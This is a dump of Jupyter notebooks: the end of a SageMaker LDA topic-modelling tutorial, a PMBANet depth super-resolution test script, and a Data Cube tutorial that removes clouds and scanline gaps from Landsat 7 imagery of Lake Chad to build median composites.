lda_inference.predict(documents_test[:12])\n\nprint(results)", "_____no_output_____" ] ], [ [ "It may be hard to see but the output format of SageMaker LDA inference endpoint is a Python dictionary with the following format.\n\n```\n{\n 'predictions': [\n {'topic_mixture': [ ... ] },\n {'topic_mixture': [ ... ] },\n {'topic_mixture': [ ... ] },\n ...\n ]\n}\n```\n\nWe extract the topic mixtures, themselves, corresponding to each of the input documents.", "_____no_output_____" ] ], [ [ "computed_topic_mixtures = np.array(\n [prediction[\"topic_mixture\"] for prediction in results[\"predictions\"]]\n)\n\nprint(computed_topic_mixtures)", "_____no_output_____" ] ], [ [ "If you decide to compare these results to the known topic mixtures generated in the [Obtain Example Data](#ObtainExampleData) Section keep in mind that SageMaker LDA discovers topics in no particular order. That is, the approximate topic mixtures computed above may be permutations of the known topic mixtures corresponding to the same documents.", "_____no_output_____" ] ], [ [ "print(topic_mixtures_test[0]) # known test topic mixture\nprint(computed_topic_mixtures[0]) # computed topic mixture (topics permuted)", "_____no_output_____" ] ], [ [ "## Stop / Close the Endpoint\n\nFinally, we should delete the endpoint before we close the notebook.\n\nTo do so execute the cell below. Alternately, you can navigate to the \"Endpoints\" tab in the SageMaker console, select the endpoint with the name stored in the variable `endpoint_name`, and select \"Delete\" from the \"Actions\" dropdown menu. 
", "_____no_output_____" ] ], [ [ "sagemaker.Session().delete_endpoint(lda_inference.endpoint_name)", "_____no_output_____" ] ], [ [ "# Epilogue\n\n---\n\nIn this notebook we,\n\n* generated some example LDA documents and their corresponding topic-mixtures,\n* trained a SageMaker LDA model on a training set of documents,\n* created an inference endpoint,\n* used the endpoint to infer the topic mixtures of a test input.\n\nThere are several things to keep in mind when applying SageMaker LDA to real-word data such as a corpus of text documents. Note that input documents to the algorithm, both in training and inference, need to be vectors of integers representing word counts. Each index corresponds to a word in the corpus vocabulary. Therefore, one will need to \"tokenize\" their corpus vocabulary.\n\n$$\n\\text{\"cat\"} \\mapsto 0, \\; \\text{\"dog\"} \\mapsto 1 \\; \\text{\"bird\"} \\mapsto 2, \\ldots\n$$\n\nEach text document then needs to be converted to a \"bag-of-words\" format document.\n\n$$\nw = \\text{\"cat bird bird bird cat\"} \\quad \\longmapsto \\quad w = [2, 0, 3, 0, \\ldots, 0]\n$$\n\nAlso note that many real-word applications have large vocabulary sizes. It may be necessary to represent the input documents in sparse format. Finally, the use of stemming and lemmatization in data preprocessing provides several benefits. Doing so can improve training and inference compute time since it reduces the effective vocabulary size. More importantly, though, it can improve the quality of learned topic-word probability matrices and inferred topic mixtures. For example, the words *\"parliament\"*, *\"parliaments\"*, *\"parliamentary\"*, *\"parliament's\"*, and *\"parliamentarians\"* are all essentially the same word, *\"parliament\"*, but with different conjugations. For the purposes of detecting topics, such as a *\"politics\"* or *governments\"* topic, the inclusion of all five does not add much additional value as they all essentiall describe the same feature.", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ] ]
cb1d272892087485d2b06c9f3be6e9cf6280fed4
34,839
ipynb
Jupyter Notebook
PMBANet_TOPO/Test_TOPO.ipynb
Alina-Mingchi/TOPO_final
a8983006929b60bda0ed1d2e9a9130427b628431
[ "MIT" ]
null
null
null
PMBANet_TOPO/Test_TOPO.ipynb
Alina-Mingchi/TOPO_final
a8983006929b60bda0ed1d2e9a9130427b628431
[ "MIT" ]
null
null
null
PMBANet_TOPO/Test_TOPO.ipynb
Alina-Mingchi/TOPO_final
a8983006929b60bda0ed1d2e9a9130427b628431
[ "MIT" ]
null
null
null
28.650493
337
0.5435
[ [ [ "from __future__ import print_function\nimport argparse\nimport os\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\nfrom data import get_eval_set\nfrom functools import reduce\nimport scipy.io as sio\nimport time\nimport imageio\nimport os\nimport numpy as np\nfrom PIL import Image\nimport scipy.signal\n\nfrom pmpanet_x8 import Net as PMBAX8\n", "_____no_output_____" ], [ "def downsample(ar,factor):\n kernel = np.full((factor,factor),1/(factor**2))\n ar = scipy.signal.convolve2d(np.asarray(ar),kernel,mode='full')\n ar = ar[factor-1::factor,factor-1::factor]\n return ar\n ", "_____no_output_____" ], [ "current_dir = os.getcwd()\ndirect = os.path.abspath(os.path.join(current_dir, os.pardir))\ndirectory = direct+'/Data_preprocessing'", "_____no_output_____" ], [ "# Create folder of png for the lr depth\n\n# rgb_dir = directory+'/EPFL_nadir/rgb/'\n# rgb_dir = directory+'/EPFL_oblique/rgb/'\n# rgb_dir = directory+'/comballaz_nadir/rgb/'\nrgb_dir = directory+'/comballaz_oblique/rgb/'\n_files = os.listdir(rgb_dir)\n_files.sort()\n_rgb_files = [rgb_dir + f for f in _files]\n_rgb_files.sort()\nprint(len(_rgb_files))\n\n# dist_dir = directory+'/EPFL_nadir/dist/'\n# dist_dir = directory+'/EPFL_oblique/dist/'\n# dist_dir = directory+'/comballaz_nadir/dist/'\ndist_dir = directory+'/comballaz_oblique/dist/'\n_files = os.listdir(dist_dir)\n_files.sort()\n_dist_files = [dist_dir + f for f in _files]\n_dist_files.sort()\nprint(len(_dist_files))\n\n\nfor num in range(len(_dist_files)):\n dist_img = torch.load(_dist_files[num])\n dist_img = dist_img.detach().cpu().numpy()\n down_img = downsample(dist_img,8)\n \n temp = np.zeros((136,160))\n temp[:60,:90] = down_img\n print(temp.shape)\n im = Image.fromarray(temp)\n im = im.convert('L')\n# im.save(directory+'/EPFL_nadir/distpng/'+str(num)+'.png')\n# im.save(directory+'/EPFL_oblique/distpng/'+str(num)+'.png')\n# im.save(directory+'/comballaz_nadir/distpng/'+str(num)+'.png')\n im.save(directory+'/comballaz_oblique/distpng/'+str(num)+'.png')\n \n rgb_img = imageio.imread(_rgb_files[num])\n temp2 = np.zeros((1088,1280,3))\n temp2[:480,:720,:] = rgb_img\n print(temp2.shape)\n# imageio.imsave(directory+'/EPFL_nadir/rgbpng/'+str(num)+'.png',temp2)\n# imageio.imsave(directory+'/EPFL_oblique/rgbpng/'+str(num)+'.png',temp2)\n# imageio.imsave(directory+'/comballaz_nadir/rgbpng/'+str(num)+'.png',temp2)\n imageio.imsave(directory+'/comballaz_oblique/rgbpng/'+str(num)+'.png',temp2)\n", "Lossy conversion from float64 to uint8. Range [0.0, 255.0]. Convert image to uint8 prior to saving to suppress this warning.\n" ], [ "def save_img(img, img_name):\n\n save_img = img.squeeze().clamp(0, 1).numpy()\n\n save_dir=os.path.join(opt.output,opt.test_dataset)\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n \n save_fn = save_dir +'/'+ img_name\n imageio.imwrite(save_fn,save_img*255)", "_____no_output_____" ], [ "# # Testing settings EPFL nadir\n# parser = argparse.ArgumentParser(description='PyTorch Super Res Example')\n# parser.add_argument('--upscale_factor', type=int, default=8, help=\"super resolution upscale factor\")\n# parser.add_argument('--testBatchSize', type=int, default=1, help='testing batch size')\n# parser.add_argument('--gpu_mode', type=bool, default=False)\n# parser.add_argument('--threads', type=int, default=1, help='number of threads for data loader to use')\n# parser.add_argument('--seed', type=int, default=123, help='random seed to use. 
Default=123')\n# parser.add_argument('--gpus', default=1, type=float, help='number of gpu')\n# parser.add_argument('--input_dir', type=str, default=directory)\n# parser.add_argument('--output', default='/EPFL_nadir/Results/', help='Location to save checkpoint models')\n# parser.add_argument('--test_dataset', type=str, default='/EPFL_nadir/distpng/')\n# parser.add_argument('--test_rgb_dataset', type=str, default='/EPFL_nadir/rgbpng/')\n# parser.add_argument('--model_type', type=str, default='PMBAX8')\n# parser.add_argument('--model', default=\"./pre_train_model/PMBA_color_x8.pth\", help='pretrained x8 model')\n\n# opt = parser.parse_args(\"\")\n\n# gpus_list=range(opt.gpus)\n# print(opt)\n", "_____no_output_____" ], [ "# # Testing settings EPFL oblique\n# parser = argparse.ArgumentParser(description='PyTorch Super Res Example')\n# parser.add_argument('--upscale_factor', type=int, default=8, help=\"super resolution upscale factor\")\n# parser.add_argument('--testBatchSize', type=int, default=1, help='testing batch size')\n# parser.add_argument('--gpu_mode', type=bool, default=False)\n# parser.add_argument('--threads', type=int, default=1, help='number of threads for data loader to use')\n# parser.add_argument('--seed', type=int, default=123, help='random seed to use. Default=123')\n# parser.add_argument('--gpus', default=1, type=float, help='number of gpu')\n# parser.add_argument('--input_dir', type=str, default=directory)\n# parser.add_argument('--output', default='/EPFL_oblique/Results/', help='Location to save checkpoint models')\n# parser.add_argument('--test_dataset', type=str, default='/EPFL_oblique/distpng/')\n# parser.add_argument('--test_rgb_dataset', type=str, default='/EPFL_oblique/rgbpng/')\n# parser.add_argument('--model_type', type=str, default='PMBAX8')\n# parser.add_argument('--model', default=\"./pre_train_model/PMBA_color_x8.pth\", help='pretrained x8 model')\n\n# opt = parser.parse_args(\"\")\n\n# gpus_list=range(opt.gpus)\n# print(opt)\n", "_____no_output_____" ], [ "# # Testing settings comballz nadir\n# parser = argparse.ArgumentParser(description='PyTorch Super Res Example')\n# parser.add_argument('--upscale_factor', type=int, default=8, help=\"super resolution upscale factor\")\n# parser.add_argument('--testBatchSize', type=int, default=1, help='testing batch size')\n# parser.add_argument('--gpu_mode', type=bool, default=False)\n# parser.add_argument('--threads', type=int, default=1, help='number of threads for data loader to use')\n# parser.add_argument('--seed', type=int, default=123, help='random seed to use. 
Default=123')\n# parser.add_argument('--gpus', default=1, type=float, help='number of gpu')\n# parser.add_argument('--input_dir', type=str, default=directory)\n# parser.add_argument('--output', default='/comballaz_nadir/Results/', help='Location to save checkpoint models')\n# parser.add_argument('--test_dataset', type=str, default='/comballaz_nadir/distpng/')\n# parser.add_argument('--test_rgb_dataset', type=str, default='/comballaz_nadir/rgbpng/')\n# parser.add_argument('--model_type', type=str, default='PMBAX8')\n# parser.add_argument('--model', default=\"./pre_train_model/PMBA_color_x8.pth\", help='pretrained x8 model')\n\n# opt = parser.parse_args(\"\")\n\n# gpus_list=range(opt.gpus)\n# print(opt)", "_____no_output_____" ], [ "# Testing settings comballz oblique\nparser = argparse.ArgumentParser(description='PyTorch Super Res Example')\nparser.add_argument('--upscale_factor', type=int, default=8, help=\"super resolution upscale factor\")\nparser.add_argument('--testBatchSize', type=int, default=1, help='testing batch size')\nparser.add_argument('--gpu_mode', type=bool, default=False)\nparser.add_argument('--threads', type=int, default=1, help='number of threads for data loader to use')\nparser.add_argument('--seed', type=int, default=123, help='random seed to use. Default=123')\nparser.add_argument('--gpus', default=1, type=float, help='number of gpu')\nparser.add_argument('--input_dir', type=str, default=directory)\nparser.add_argument('--output', default='/comballaz_oblique/Results/', help='Location to save checkpoint models')\nparser.add_argument('--test_dataset', type=str, default='/comballaz_oblique/distpng/')\nparser.add_argument('--test_rgb_dataset', type=str, default='/comballaz_oblique/rgbpng/')\nparser.add_argument('--model_type', type=str, default='PMBAX8')\nparser.add_argument('--model', default=\"./pre_train_model/PMBA_color_x8.pth\", help='pretrained x8 model')\n\nopt = parser.parse_args(\"\")\n\ngpus_list=range(opt.gpus)\nprint(opt)", "Namespace(gpu_mode=False, gpus=1, input_dir='/home/beast2020/Desktop/mingchi/', model='./pre_train_model/PMBA_color_x8.pth', model_type='PMBAX8', output='comballaz_oblique/Results/', seed=123, testBatchSize=1, test_dataset='comballaz_oblique/distpng/', test_rgb_dataset='comballaz_oblique/rgbpng/', threads=1, upscale_factor=8)\n" ], [ "\ncuda = opt.gpu_mode\nif cuda and not torch.cuda.is_available():\n raise Exception(\"No GPU found, please run without --cuda\")\n\ntorch.manual_seed(opt.seed)\nif cuda:\n torch.cuda.manual_seed(opt.seed)\n\nprint('===> Loading datasets')\ntest_set = get_eval_set(os.path.join(opt.input_dir,opt.test_dataset),os.path.join(opt.input_dir,opt.test_rgb_dataset))\ntesting_data_loader = DataLoader(dataset=test_set, batch_size=opt.testBatchSize, shuffle=False)\n\nprint('===> Building model')\nif opt.model_type == 'PMBAX8':\n model = PMBAX8(num_channels=1, base_filter=64, feat = 256, num_stages=3, scale_factor=opt.upscale_factor) ##For NTIRE2018\nelse:\n model = PMBAX8(base_filter=64, feat = 256, num_stages=5, scale_factor=opt.upscale_factor) ###D-DBPN\n####\nif cuda:\n model = torch.nn.DataParallel(model, device_ids=gpus_list)\n\nif os.path.exists(opt.model):\n model.load_state_dict(torch.load(opt.model, map_location=lambda storage, loc: storage))\n print('Pre-trained x8 model is loaded.<---------------------------->')\n\nif cuda:\n model = model.cuda(gpus_list[0])\n\n", "===> Loading datasets\n===> Building model\nPre-trained x8 model is loaded.<---------------------------->\n" ], [ 
"model.eval()\ntorch.set_grad_enabled(False)\n", "_____no_output_____" ], [ "\nfor batch in testing_data_loader:\n input_i,input_rgb, name = Variable(batch[0],volatile=True),Variable(batch[1],volatile=True), batch[2]\n if cuda:\n input_i = input_i.cuda(gpus_list[0])\n input_rgb = input_rgb.cuda(gpus_list[0])\n t0 = time.time()\n prediction = model(input_rgb,input_i)\n t1 = time.time()\n print(\"===> Processing: %s || Timer: %.4f sec.\" % (name[0], (t1 - t0)))\n save_img(prediction.cpu().data, name[0])\n\n\n", "/tmp/ipykernel_1942169/1991822337.py:2: UserWarning: volatile was removed and now has no effect. Use `with torch.no_grad():` instead.\n input_i,input_rgb, name = Variable(batch[0],volatile=True),Variable(batch[1],volatile=True), batch[2]\nLossy conversion from float32 to uint8. Range [0.0, 255.0]. Convert image to uint8 prior to saving to suppress this warning.\n" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
cb1d2f909c4c5637fdb47b0e89f23c23f37fa8d5
25,669
ipynb
Jupyter Notebook
notebooks/IGARSS/igarss_chad_02.ipynb
admariner/data_cube_notebooks
984a84b2f92114040e36a533d3f476dcf384695e
[ "Apache-2.0" ]
null
null
null
notebooks/IGARSS/igarss_chad_02.ipynb
admariner/data_cube_notebooks
984a84b2f92114040e36a533d3f476dcf384695e
[ "Apache-2.0" ]
null
null
null
notebooks/IGARSS/igarss_chad_02.ipynb
admariner/data_cube_notebooks
984a84b2f92114040e36a533d3f476dcf384695e
[ "Apache-2.0" ]
null
null
null
31.886957
424
0.5837
[ [ [ "# Enable importing of utilities\nimport sys\nsys.path.append('..')\n%matplotlib inline", "_____no_output_____" ] ], [ [ "# Cleaning up imagery for pre and post rainy season\n\nThe [previous tutorial](igarrs_chad_01.ipynb) addressed the identifying the extent of the rainy season near Lake Chad. This tutorial will focus on cleaning up optical imagery to make it suitable for water-detection algorithms. \n \n<br> ", "_____no_output_____" ], [ "# What to expect from this notebook\n\n- Introduction to landsat 7 data.\n- basic xarray manipulations \n- removing clouds and scanline error using `pixel_qa`\n- building a composite image \n- saving products \n\n<br> \n\n# Algorithmic process \n<br>\n\n![](../diagrams/rainy_demo/alg_jn2_02.png)\n\n<br> \nThe algorithmic process is fairly simple. It is a composable chain of operations on landsat 7 imagery. The goal is to create a **scanline free** and **cloud-free** representation of the data for **pre** and **post** rainy season segments of 2015. The process is outlined as follows: \n\n1. load landsat imagery data for 2015 \n2. isolate pre and post rainy season data \n3. remove clouds and scan-line errors from pre and post rainy sesaon data. \n4. build a cloud free composite for pre and post rainy sesaon data. \n5. export the data for future use \n\nWhat scanline-free or cloud-free means will be addressed later in the tutorial. To understand everything, just follow the steps in sequence. \n\n", "_____no_output_____" ], [ "# Creating a Datacube Object \n<br>\nThe following code connects to the datacube and accepts `cloud_removal_in_chad` as an app-name. The app name is typically only used in logging and debugging. \n<br>", "_____no_output_____" ] ], [ [ "import datacube\ndc = datacube.Datacube(app = \"cloud_removal_in_chad\") ", "_____no_output_____" ] ], [ [ "<br> \n\nLike in the previous tutorial. The datacube object will be used to load data that has previously been ingested by the datacube. \n \n<br>", "_____no_output_____" ], [ "## Defining the boundaries of the area and restricting measurements", "_____no_output_____" ] ], [ [ "## Define Geographic boundaries using a (min,max) tuple.\nlatitude = (12.75, 13.0)\nlongitude = (14.25, 14.5)\n\n## Specify a date range using a (min,max) tuple \nfrom datetime import datetime\ntime = (datetime(2015,1,1), datetime(2016,1,1))\n\n## define the name you gave your data while it was being \"ingested\", as well as the platform it was captured on. \nplatform = 'LANDSAT_7' \nproduct = 'ls7_ledaps_lake_chad_full' \n\nmeasurements = ['red', 'green', 'blue', 'nir', 'swir1', 'swir2','pixel_qa']", "_____no_output_____" ] ], [ [ "As a reminder and in-notebook reference, the following line of code displays the extents of the study area. Re-orient yourself with it. ", "_____no_output_____" ] ], [ [ "from utils.data_cube_utilities.dc_display_map import display_map\ndisplay_map(latitude = (12.75, 13.0),longitude = (14.25, 14.5)) ", "_____no_output_____" ] ], [ [ "<br> \n\n## Loading in Landsat 7 imagery \nThe following code loads in landsat 7 imagery using the constraints defined above", "_____no_output_____" ] ], [ [ "#Load Landsat 7 data using parameters,\nlandsat_data = dc.load(latitude = latitude,\n longitude = longitude,\n time = time,\n product = product,\n platform = platform,\n measurements = measurements)", "_____no_output_____" ] ], [ [ "<a id='#intro_ls7'></a> \n\n# Explore the Landsat 7 dataset\n\nThe previous tutorial barely grazed the concept of xarray variables. 
\nTo understand how we use landsat7 imagery it will be necessary to make a brief detour and explain it in greater detail. \n<br> \n\n### xarray - Variables & Data-arrays \nWhen you output the contents of your loaded -dataset... \n", "_____no_output_____" ] ], [ [ "print(landsat_data)", "_____no_output_____" ] ], [ [ "<br> \n.. you should notice a list of values called data-variables.\n\n<br> \n\nThese 'variables' are really 3 dimensional [data-arrays](http://xarray.pydata.org/en/stable/data-structures.html) housing values like 'red', 'green', 'blue', and 'nir', values for each lat,lon,time coordinate pair in your dataset. Think of an [xarray.Dataset](http://xarray.pydata.org/en/stable/data-structures.html#dataset) as an object that houses many different types of data under a shared coordinate system. \n<br> \n \n![](diagrams/rainy_demo/ls7_xarray.png) \n\n<br> \n\nIf you wish to fetch certain data from your dataset you can call it by its variable name. So, if for example, you wanted to get the near-infrared data-array from the dataset, you would just index it like so: \n<br> ", "_____no_output_____" ] ], [ [ "landsat_data.nir ", "_____no_output_____" ] ], [ [ "<br> \n\nThe object printed above is a [data-array](http://xarray.pydata.org/en/stable/generated/xarray.DataArray.html). Unlike a data-set, data-arrays only house one type of data and has its own set of attributes and functions. \n \n<br> ", "_____no_output_____" ], [ "### xarray - Landsat 7 Values \nLet's explore landsat datasets in greater detail by starting with some background about what sort of data landsat satellites collect... \n \nIn layman terms, Landsat satellites observe light that is reflected or emitted from the surface of the earth.\n\n<br> \n \n![](../diagrams/rainy_demo/visual_spectrum.jpg)\n\n<br>\n\nIn landsat The spectrum for observable light is split up into smaller sections like 'red', 'green', 'blue', 'thermal','infrared' so-on and so forth... \n\n\nEach of these sections will have some value denoting how much of that light was reflected from each pixel. The dataset we've loaded in contains values for each of these sections in separate data-arrays under a shared dataset. \n\nThe ones used in this series of notebooks are: \n\n- `red`\n- `green` \n- `blue`\n- `nir` - near infrared\n- `swir1` - band for short wave infrared \n- `swir2` - band for short wave infrared\n\nThere is an alternative band attached to the Landsat7 xarray dataset called pixel qa.\n\n- `pixel_qa` - land cover classifications", "_____no_output_____" ], [ "### Taking a look at landsat data taken on July 31st, 2015 \n\nThe data listed above can be used in conjunction to display a visual readout of the area. The code below will use our `red` `green`, and `blue` values to produce a **png** of one of our time slices. ", "_____no_output_____" ] ], [ [ "## The only take-away from this code should be that a .png is produced. \n## Any details about how this function is used is out of scope for this tutorial \n\nfrom utils.data_cube_utilities.dc_utilities import write_png_from_xr\nwrite_png_from_xr('../demo/landsat_rgb.png', landsat_data.isel(time = 11), [\"red\", \"green\", \"blue\"], scale = [(0,2000),(0,2000),(0,2000)])", "_____no_output_____" ] ], [ [ "![](demo/landsat_rgb.png)", "_____no_output_____" ], [ "# The need to clean up imagery\n\nConsidering the imagery above. It is hard to build a comprehensive profile on landcover. There are several objects that occlude the surface of the earth. 
Namely errors introduced by an SLC malfunction, as well as cloud cover. \n\n### Scanline Gaps \n\nIn May of 2003, Landsat7's scan line correction system failed (SLC). This essentially renders several horizontal rows of imagery unusable for analysis. Luckily, these scanline gaps don't always appear in the same spots. With enough imagery, a \"gap-less\" representation can be constructed that we can use to analyze pre and post rainy season. \n \n<br> \n\n![](diagrams/rainy_demo/slc_error_02.PNG)\n\n<br> \n \n \n### Cloud occlusion \n \nClouds get in the way of analyzing/observing the surface reflectance values of Lake Chad. Fortunately, like SLC gaps, clouds don't always appear in the same spot. With enough imagery, taken at close enough intervals, a \"cloudless\" representation of the area can be built for pre and post rainy season acquisitions of the region. \n\n<br> \n \n ![](diagrams/rainy_demo/cloud_clip_01.PNG)\n \n<br> \n\n>**Strong Assumptions** \n>In this analysis, strong assumptions are made regarding the variability of lake size in the span of a few acquisitions.(Namely, that the size in a pre-rainy season won't vary as much as it will after the rainy season contributes to the surface area of the lake) \n\n", "_____no_output_____" ], [ "# Cleaning up Pre and Post rainy season Imagery ", "_____no_output_____" ], [ "### Splitting the dataset in two \nThe first step to cleaning up pre and post rainy season imagery is to split our year's worth of acquisitions into two separate datasets. In the previous notebooks, We've discovered that an appropriate boundary for the rainy season is sometime between June and October. For the sake of this notebook, we'll choose the first day in both months. \n<br> ", "_____no_output_____" ] ], [ [ "start_of_rainy_season = '2015-06-01'\nend_of_rainy_season = '2015-10-01'", "_____no_output_____" ] ], [ [ "<br> \nThe next step after defining this would be to define the time ranges for both post and pre, then use them to select subsections from the original dataset to act as two separate datasets. (Like in the diagram below) \n\n<br> \n\n![](diagrams/rainy_demo/split_02.png) \n\n<br>", "_____no_output_____" ] ], [ [ "start_of_year = '2015-01-01'\nend_of_year = '2015-12-31'\n\npre = landsat_data.sel(time = slice(start_of_year, start_of_rainy_season))\npost = landsat_data.sel(time = slice(end_of_rainy_season, end_of_year))", "_____no_output_____" ] ], [ [ "<br> \n\n# Building a cloud-free and gap-free representation \n\nThis section of the process works s by masking out clouds and gaps from the imagery and then selecting a median valued cloud/scanline-gap free pixels of an image. \n \n![](diagrams/rainy_demo/cleanup.png)\n \n<br> \n \n- Masking is done using the **pixel_qa** variable. \n- The gap/cloud-free compositing is done using a technique called **median-pixel-mosaicing** \n\n<br> ", "_____no_output_____" ], [ "\n### Masking out clouds and SLC gaps using `pixel_qa`\nWe're going to be using one of our loaded values called `pixel_qa` for the masking step. \n\n`pixel_qa` doesn't convey surface reflectance intensities. Instead, it is a band that contains more abstract information for each pixel. 
It places a pixel under one or more of the following categories: \n\n- `clear` - pixel is likely normal landcover \n- `water` - pixel is likely water \n- `cloud_shadow` - pixel is likely in the shadow of a cloud \n- `snow` - the pixel is likely snowy \n- `cloud` - the pixel is likely cloudy \n- `fill` - the pixel is classified as not fit for analysis (SRC-Gaps fall in this classification) \n\nWe will use these classifications to mask out values unsuitable for analysis. \n", "_____no_output_____" ], [ "### A Masking Function \nThe masking step will have to make use of a very peculiar encoding for each category. \n<br> \n\n\\begin{array}{|c|c|}\n\\hline bit & value & sum & interpretation \\\\\\hline\n \t\t0 & 1 & 1 & Fill \\\\\\hline \n 1 & 2 & 3 & Clear \\\\\\hline\n 2 & 4 & 7 & Water \\\\\\hline\n 3 & 8 & 15 & Cloud Shadow \\\\\\hline\n 4 & 16 & 31 & Snow \\\\\\hline\n 5 & 32 & 63 & Cloud \\\\\\hline\n 6 & 64 & 127 & Cloud Confidence \\\\\n &&& 00 = None \\\\\n 7& 128& 255 & 01 = Low \\\\\n &&& 10 = Med \\\\\n &&& 11 = High \\\\\\hline \n \\end{array} \n \n<br> \n\nThe following function was constructed to mask out anything that isn't **clear** or **water**. \n<br> ", "_____no_output_____" ] ], [ [ "import numpy as np \n\ndef cloud_and_slc_removal_mask(dataset):\n #Create boolean Masks for clear and water pixels\n clear_pixels = dataset.pixel_qa.values == 2 + 64\n water_pixels = dataset.pixel_qa.values == 4 + 64\n \n a_clean_mask = np.logical_or(clear_pixels, water_pixels)\n return a_clean_mask", "_____no_output_____" ] ], [ [ "<br> \nThe following code creates a **boolean** mask, for slc code. \n<br> ", "_____no_output_____" ] ], [ [ "mask_for_pre = cloud_and_slc_removal_mask(pre)\nmask_for_post = cloud_and_slc_removal_mask(post) ", "_____no_output_____" ] ], [ [ "<br> \nA boolean mask is essentially what it sounds like. Let's look at its print-out \n\n<br> ", "_____no_output_____" ] ], [ [ "print(mask_for_post)", "_____no_output_____" ] ], [ [ "<br> \n\nThis boolean mask contains a **true** value for pixels that are clear and un-occluded by clouds or scanline gaps and **false** values where the opposite is true. \n<br> \n\n### Example of mask use \n\nThere are many ways to apply a mask. The following example is the xarray way. It will apply *nan* values to areas with clouds or scanline issues: \n<br>", "_____no_output_____" ] ], [ [ "pre.where(mask_for_pre)", "_____no_output_____" ] ], [ [ "Notice that a lot of the values in the array above have nan values. Compositing algorithms like the **median-pixel mosaic** below, make use of this **where** function as well as 'nans' as the marker for no-data values. ", "_____no_output_____" ], [ "<br> \n### Median Pixel Mosaic\nA median pixel mosaic is used for our cloud/slc-gap free representation of satellite imagery. It Works by masking out clouds/slc-gaps from imagery, and using the median valued cloud-free pixels in the time series of each lat-lon coordinate pair \n\n<br> \n![](diagrams/rainy_demo/median_comp.png)\n \n", "_____no_output_____" ], [ "Here is a function we can use to build our mosaic. Its exact mechanics are abstracted away from this tutorial and can be explored in further detail by visiting [our github](https://github.com/ceos-seo/data_cube_utilities/blob/master/dc_mosaic.py). 
\n<br>", "_____no_output_____" ] ], [ [ "from utils.data_cube_utilities.dc_mosaic import create_median_mosaic\n\ndef mosaic(dataset, mask):\n return create_median_mosaic(dataset, clean_mask = mask)", "_____no_output_____" ] ], [ [ "<br>\nLets use it to generate our cloud free representations of the area: \n<br> ", "_____no_output_____" ] ], [ [ "clean_pre = mosaic(pre, mask_for_pre) \nclean_post = mosaic(post, mask_for_post)", "_____no_output_____" ] ], [ [ "<br>\n# Taking a peek at our cloud-free composites\n<br> \n### Pre Rainy Season ", "_____no_output_____" ] ], [ [ "print(clean_pre) ", "_____no_output_____" ], [ "write_png_from_xr('../demo/pre_rain_mosaic.png', clean_pre, [\"red\", \"green\", \"blue\"], scale = [(0,2000),(0,2000),(0,2000)])", "_____no_output_____" ] ], [ [ "Your png should look something like this: \n![](demo/pre_rain_mosaic.png) ", "_____no_output_____" ], [ "### Post Rainy Season \n", "_____no_output_____" ] ], [ [ "print(clean_post) ", "_____no_output_____" ], [ "write_png_from_xr('../demo/post_rain_mosaic.png', clean_post, [\"red\", \"green\", \"blue\"], scale = [(0,2000),(0,2000),(0,2000)])", "_____no_output_____" ] ], [ [ "![](demo/post_rain_mosaic.png) ", "_____no_output_____" ], [ "# Next Steps\n\nThe [next notebook](igarss_chad_03.ipynb) in the series deals with water classification on these cloud free composites! We'll need to save our work so that it can be loaded in the next notebook. The good news is that xarrays closely resemble the structure of net NETCDF files. It would make sense to save it off in that format. The code below saves these files as NETCDFS using built-in export features of xarray. ", "_____no_output_____" ] ], [ [ "## Lets drop pixel qa since it doesn't make sense to house it in a composite. \nfinal_post = clean_post.drop('pixel_qa')\nfinal_pre = clean_pre.drop('pixel_qa')\n\nfinal_post.to_netcdf('../demo/post_rain.nc')\nfinal_pre.to_netcdf('../demo/pre_rain.nc')", "_____no_output_____" ] ], [ [ " The entire notebook has been condensed down to a about 2 dozen lines of code below.", "_____no_output_____" ] ], [ [ "import datacube\nfrom datetime import datetime\nfrom utils.data_cube_utilities.dc_mosaic import create_median_mosaic\n\ndef mosaic(dataset, mask):\n return create_median_mosaic(dataset, clean_mask = mask)\n\ndef cloud_and_slc_removal_mask(dataset):\n clear_pixels = dataset.pixel_qa.values == 2 + 64\n water_pixels = dataset.pixel_qa.values == 4 + 64\n a_clean_mask = np.logical_or(clear_pixels, water_pixels)\n return a_clean_mask\n\n#datacube obj\ndc = datacube.Datacube(app = \"cloud_removal_in_chad\", config = '/home/localuser/.datacube.conf') \n\n#load params\nlatitude = (12.75, 13.0)\nlongitude = (14.25, 14.5)\ntime = (datetime(2015,1,1), datetime(2016,1,1))\n\nplatform = 'LANDSAT_7' \nproduct = 'ls7_ledaps_lake_chad_full' \nmeasurements = ['red', 'green', 'blue', 'nir', 'swir1', 'swir2','pixel_qa']\n\n#load\nlandsat_data = dc.load(latitude = latitude, longitude = longitude, time = time, product = product, platform = platform, measurements = measurements)\n\n#time split params\nstart_of_rainy_season = '2015-06-01'\nend_of_rainy_season = '2015-10-01'\nstart_of_year = '2015-01-01'\nend_of_year = '2015-12-31'\n\n#time split\npre = landsat_data.sel(time = slice(start_of_year, start_of_rainy_season))\npost = landsat_data.sel(time = slice(end_of_rainy_season, end_of_year))\n\n#mask for mosaic processs\nmask_for_pre = cloud_and_slc_removal_mask(pre)\nmask_for_post = cloud_and_slc_removal_mask(post) \n\n#mosaic process\nclean_pre = 
mosaic(pre, mask_for_pre) \nclean_post = mosaic(post, mask_for_post)\n\n#save file\nclean_pre.drop('pixel_qa').to_netcdf('../demo/pre_01.cd')\nclean_post.drop('pixel_qa').to_netcdf('../demo/post_01.cd')", "_____no_output_____" ] ] ]
